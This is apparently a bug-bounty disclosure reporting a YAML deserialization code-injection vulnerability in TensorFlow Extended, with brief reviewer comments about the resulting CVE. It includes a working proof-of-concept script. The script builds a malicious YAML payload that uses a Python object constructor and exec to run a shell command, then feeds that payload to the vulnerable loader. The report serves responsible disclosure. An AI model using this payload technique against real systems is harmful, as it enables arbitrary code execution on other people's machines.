Code Injection in tensorflow/tfx

Valid

Reported on

Jan 28th 2021

Description

TensorFlow Extended (TFX) is a Google-production-scale machine learning platform based on TensorFlow. It provides a configuration framework to express ML pipelines consisting of TFX components.

Vulnerability

Vulnerable to YAML deserialization attack caused by unsafe loading.

Proof of Concept

Installation

pip3 install tfx

Run exploit.py

import os
#os.sysem('pip3 install tfx')
from tfx.extensions.experimental.kfp_compatibility import kfp_container_component
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(payload)
kfp_container_component.load_kfp_yaml_container_component('config.yml')
  • python3 exploit.py

Impact

Arbitary Code Execution

Jamie Slome
2 years ago

Admin

Ooo, shiny!

Abhiram V
2 years ago

Researcher

OMG thanks huntr for the CVE

Jamie Slome
2 years ago

Admin

https://github.com/CVEProject/cvelist/pull/2002 for reference.

to join this conversation